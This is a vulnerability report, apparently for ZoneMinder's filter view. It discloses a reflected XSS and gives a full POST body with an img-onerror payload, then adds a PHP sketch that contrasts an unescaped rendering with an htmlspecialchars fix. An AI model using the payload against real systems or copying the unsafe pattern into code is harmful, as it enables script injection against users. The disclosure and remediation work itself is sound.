Describe the bug
The view filter insecurely displays the filter[Query][terms][0][val] parameter value without applying any proper output filtration, leading to XSS.

To Reproduce
Affected URL:
http://localhost/zm/?sort_asc=1&sort_field=StartTime&view=filter

POST Data -
executeButton=&action=&filter[AutoArchive]=1&filter[AutoDelete]=1&filter[AutoExecute]=1&filter[AutoExecuteCmd]=0&filter[AutoMove]=1&filter[AutoMoveTo]=1&filter[AutoVideo]=1&filter[B [limit]=100&filter[Query][sort_asc]=1&filter[Query][sort_field]=Id&filter[Query][terms][0][attr]=MonitorId&filter[Query][terms][0][op]==&filter[Query][terms][0][val]="><img src=x onerror=prompt('1');>&filter[UpdateDiskSpace]=1&Id=&object=filter

Payload used -
"><img src=x onerror=prompt('1');>

Navigate to the Affected URL; the payload would be triggered.

Expected behavior
Proper escaping of special characters.

Debug Logs
None
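
The "proper escaping" the report asks for, sketched as an added example that is not part of the original report and is not the project's own code. It assumes a PHP view that echoes the term value into an input's value attribute; the function names and form markup are hypothetical, and the request array is constructed from the report's POST data.

```php
<?php
// Added example: hypothetical view helpers, not the application's source.
// Only the parameter path and the payload string are taken from the report.

// Vulnerable pattern: the request value is concatenated into an attribute as-is.
function renderTermUnsafe(array $filter, int $i): string {
    $val = $filter['Query']['terms'][$i]['val'] ?? '';
    return '<input type="text" name="filter[Query][terms]['.$i.'][val]" value="'.$val.'"/>';
}

// Output encoding for HTML text and quoted-attribute contexts.
function h($s): string {
    // ENT_QUOTES encodes both " and '; ENT_SUBSTITUTE replaces invalid UTF-8
    // instead of returning an empty string.
    return htmlspecialchars((string)$s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: validate the shape, then encode at the point of output.
function renderTermSafe(array $filter, int $i): string {
    $term = $filter['Query']['terms'][$i] ?? [];
    $val  = is_array($term) ? ($term['val'] ?? '') : '';
    // A nested array (e.g. ...[val][]=x) is not a valid scalar term value.
    if (!is_scalar($val)) {
        $val = '';
    }
    return '<input type="text" name="filter[Query][terms]['.$i.'][val]" value="'.h($val).'"/>';
}

// Constructed request body mirroring the POST data in the report.
$filter = ['Query' => ['terms' => [[
    'attr' => 'MonitorId',
    'op'   => '=',
    'val'  => '"><img src=x onerror=prompt(\'1\');>',
]]]];

$unsafe = renderTermUnsafe($filter, 0);
$safe   = renderTermSafe($filter, 0);

echo $unsafe, "\n"; // value="" is closed early and a live <img> element follows
echo $safe, "\n";   // the payload stays inside value="..." as inert text

// Regression check: nothing between value=" and the closing "/> may contain
// a raw angle bracket or double quote.
$inner = substr($safe, strpos($safe, 'value="') + 7, -3);
if (strpbrk($inner, '<>"') !== false) {
    throw new RuntimeException('term value was not encoded for the attribute context');
}
```

The encoding belongs at the output site rather than at input time, so the stored or submitted filter value stays unchanged and every view that renders it applies the encoding for its own context.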